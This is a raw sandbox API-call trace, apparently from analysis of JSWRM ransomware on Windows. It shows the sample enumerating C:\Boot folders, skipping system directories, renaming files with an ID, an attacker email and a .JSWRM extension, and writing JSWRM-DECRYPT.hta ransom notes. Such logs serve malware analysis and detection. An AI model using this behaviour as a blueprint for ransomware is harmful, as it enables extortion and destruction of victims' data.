hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0063.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.983] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.983] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9251806234337896) returned 0 [0063.983] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.984] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.984] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.984] CloseHandle (hObject=0xffffffff) returned 1 [0063.984] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.984] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.984] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.984] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.984] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.984] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.984] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.984] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0063.984] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.984] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0063.984] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0063.984] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225e30 [0063.984] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0063.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0063.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225e30 | out: hHeap=0x1e0000) returned 1 [0063.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.985] MoveFileW (lpExistingFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0063.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.985] FindNextFileW (in: hFindFile=0x231e40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ccc18cc, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1ccc18cc, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1ccc18cc, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0063.985] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0063.985] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0063.985] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0063.985] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0063.985] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0063.985] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0063.985] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0063.985] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0063.985] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0063.985] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0063.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.985] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0063.985] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fc0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0063.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.985] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0063.985] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0063.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0063.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0063.986] FindNextFileW (in: hFindFile=0x231e40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5ed6c6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf300233f, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa798, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0063.986] lstrcmpiW (lpString1="memtest.exe.mui", lpString2=".") returned 1 [0063.986] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="..") returned 1 [0063.986] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="...") returned 1 [0063.986] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="windows") returned -1 [0063.986] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="recovery") returned -1 [0063.986] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="perflogs") returned -1 [0063.986] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="documents and settings") returned 1 [0063.986] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0063.986] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="system volume information") returned -1 [0063.986] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="msocache") returned -1 [0063.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0063.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0063.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0063.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0063.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.986] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\memtest.exe.mui" (normalized: "c:\\boot\\ja-jp\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.986] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9257990987244136) returned 0 [0063.986] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.986] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.987] CloseHandle (hObject=0xffffffff) returned 1 [0063.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0063.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0063.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0063.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225ab0 [0063.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0063.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0063.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225ab0 | out: hHeap=0x1e0000) returned 1 [0063.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.987] MoveFileW (lpExistingFileName="C:\\Boot\\ja-JP\\memtest.exe.mui" (normalized: "c:\\boot\\ja-jp\\memtest.exe.mui"), lpNewFileName="C:\\Boot\\ja-JP\\memtest.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\ja-jp\\memtest.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0063.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.987] FindNextFileW (in: hFindFile=0x231e40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5ed6c6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf300233f, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa798, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0063.987] FindClose (in: hFindFile=0x231e40 | out: hFindFile=0x231e40) returned 1 [0063.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0063.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0063.987] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c90820a, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1c90820a, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1c90820a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0063.987] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0063.988] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0063.988] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0063.988] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0063.988] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0063.988] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0063.988] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0063.988] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0063.988] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0063.988] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0063.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0063.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0063.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0063.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0063.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0063.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0063.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0063.988] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef5fc210, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0063.988] lstrcmpiW (lpString1="ko-KR", lpString2=".") returned 1 [0063.988] lstrcmpiW (lpString1="ko-KR", lpString2="..") returned 1 [0063.988] lstrcmpiW (lpString1="ko-KR", lpString2="...") returned 1 [0063.988] lstrcmpiW (lpString1="ko-KR", lpString2="windows") returned -1 [0063.988] lstrcmpiW (lpString1="ko-KR", lpString2="recovery") returned -1 [0063.988] lstrcmpiW (lpString1="ko-KR", lpString2="perflogs") returned -1 [0063.988] lstrcmpiW (lpString1="ko-KR", lpString2="documents and settings") returned 1 [0063.988] lstrcmpiW (lpString1="ko-KR", lpString2="$RECYCLE.BIN") returned 1 [0063.988] lstrcmpiW (lpString1="ko-KR", lpString2="system volume information") returned -1 [0063.989] lstrcmpiW (lpString1="ko-KR", lpString2="msocache") returned -1 [0063.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0063.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0063.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237538 [0063.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.989] GetFileAttributesW (lpFileName="C:\\Boot\\ko-KR\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\ko-kr\\jswrm-decrypt.hta")) returned 0xffffffff [0063.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237538 | out: hHeap=0x1e0000) returned 1 [0063.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0063.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0063.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0063.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0063.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0063.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236db8 [0063.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.996] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\ko-kr\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0063.998] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0063.998] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0063.999] CloseHandle (hObject=0x450) returned 1 [0063.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236db8 | out: hHeap=0x1e0000) returned 1 [0063.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.000] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0064.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0064.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0064.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0064.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.000] 